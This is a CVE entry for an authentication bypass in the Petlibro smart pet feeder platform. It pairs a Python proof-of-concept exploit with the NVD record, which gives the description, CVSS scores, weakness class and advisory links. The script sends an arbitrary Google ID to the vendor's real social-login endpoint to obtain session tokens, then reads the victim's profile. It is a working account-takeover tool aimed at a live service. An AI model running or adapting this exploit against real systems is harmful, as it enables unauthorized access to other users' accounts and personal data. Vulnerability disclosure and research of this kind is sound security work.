CVE-2025-15115

#!/usr/bin/env python3 """ CVE-2025-15115 PoC - Petlibro Smart Pet Feeder Authentication Bypass Note: This PoC is for educational and security research purposes only. """ import requests import json import sys TARGET_HOST = "https://api.petlibro.com" # Example endpoint VULN_ENDPOINT = "/member/auth/thirdLogin" def exploit_auth_bypass(google_id, phone_brand="Android"): """ Exploit the OAuth validation flaw in Petlibro's social login system """ url = f"{TARGET_HOST}{VULN_ENDPOINT}" # Craft malicious request with arbitrary Google ID payload = { "googleId": google_id, "phoneBrand": phone_brand } headers = { "Content-Type": "application/json", "User-Agent": "Petlibro/1.7.31 Android" } try: response = requests.post(url, json=payload, headers=headers, timeout=10) if response.status_code == 200: data = response.json() if "data" in data and "token" in data.get("data", {}): token = data["data"]["token"] print(f"[+] SUCCESS: Authentication bypassed!") print(f"[+] Session Token: {token}") return token print(f"[-] Failed: Status {response.status_code}") print(f"[-] Response: {response.text}") return None except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return None def access_user_account(token): """ Use the obtained token to access user account """ headers = { "Authorization": f"Bearer {token}", "User-Agent": "Petlibro/1.7.31 Android" } # Try to access user profile profile_url = f"{TARGET_HOST}/member/user/profile" try: response = requests.get(profile_url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Account access successful!") print(f"[+] Profile: {response.text}") except requests.exceptions.RequestException as e: print(f"[-] Failed to access account: {e}") if __name__ == "__main__": print("CVE-2025-15115 - Petlibro Authentication Bypass PoC") print("=" * 50) if len(sys.argv) > 1: google_id = sys.argv[1] else: google_id = "attacker-controlled-google-id-12345" token = exploit_auth_bypass(google_id) if token: access_user_account(token)

{"cve": {"id": "CVE-2025-15115", "sourceIdentifier": "[email protected]", "published": "2026-01-04T00:15:43.573", "lastModified": "2026-02-03T17:46:43.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Petlibro Smart Pet Feeder Platform versions up to 1.7.31 contains an authentication bypass vulnerability that allows unauthenticated attackers to access any user account by exploiting OAuth token validation flaws in the social login system. Attackers can send requests to /member/auth/thirdLogin with arbitrary Google IDs and phoneBrand parameters to obtain full session tokens and account access without proper OAuth verification."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:petlibro:petlibro:*:*:*:*:-:*:*:*", "versionEndIncluding": "1.7.31", "matchCriteriaId": "0B604E0A-05A3-46E0-8558-FF3F00F5EF0D"}]}]}], "references": [{"url": "https://bobdahacker.com/blog/petlibro", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/petlibro-smart-pet-feeder-platform-through-authentication-bypass-via-api-endpoint", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}